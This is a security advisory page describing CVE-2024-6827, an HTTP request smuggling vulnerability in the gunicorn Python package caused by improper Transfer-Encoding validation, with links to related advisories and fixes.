PyPI: gunicorn
CVE-2024-6827
Safety vulnerability ID: SFTY-20250320-19787
Safety legacy ID: pyup.io-76244
Affected versions of the gunicorn package are vulnerable to HTTP Request/Response Smuggling due to improper validation of the Transfer-Encoding header that enables a TE.CL desynchronisation condition. Gunicorn’s HTTP parser does not consistently enforce RFC semantics when parsing conflicting or unsupported request framing—such as messages containing both Transfer-Encoding and Content-Length—so the backend may fall back to Content-Length while an intermediary treats the message as chunked.
Overview
Gunicorn HTTP Request/Response Smuggling vulnerability
Advisory
Affected versions of the gunicorn package are vulnerable to HTTP Request/Response Smuggling due to improper validation of the Transfer-Encoding header that enables a TE.CL desynchronisation condition. Gunicorn’s HTTP parser does not consistently enforce RFC semantics when parsing conflicting or unsupported request framing—such as messages containing both Transfer-Encoding and Content-Length—so the backend may fall back to Content-Length while an intermediary treats the message as chunked.
How to Fix
Mitigation and Workarounds
---
Vulnerable Functions
Functions linked to known vulnerabilities.
References
- https://getsafety.com/vulnerabilities/SFTY-20250320-19787/CVE-2024-6827
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6827
- https://github.com/advisories/GHSA-hc5x-x2vx-497g
- https://nvd.nist.gov/vuln/detail/CVE-2024-6827
- https://huntr.com/bounties/1b4f8f38-39da-44b6-9f98-f618639d0dd7
- https://github.com/benoitc/gunicorn/issues/3278
- https://github.com/benoitc/gunicorn/issues/3087
- https://github.com/benoitc/gunicorn/pull/3113
- https://github.com/benoitc/gunicorn/releases/tag/22.0.0
- https://github.com/advisories/GHSA-hc5x-x2vx-497g
Verified by Safety
Our Cybersecurity Intelligence Team reviewed this vulnerability. We combine public data with our own research to find issues not yet reported to public sources.
Learn more